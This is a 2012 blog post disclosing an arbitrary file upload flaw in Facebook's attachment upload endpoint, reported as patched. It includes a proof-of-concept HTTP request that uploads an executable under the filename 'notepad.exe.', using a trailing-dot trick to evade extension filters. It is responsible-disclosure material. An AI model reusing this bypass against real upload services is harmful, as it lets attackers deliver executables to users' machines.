Thursday, May 3, 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.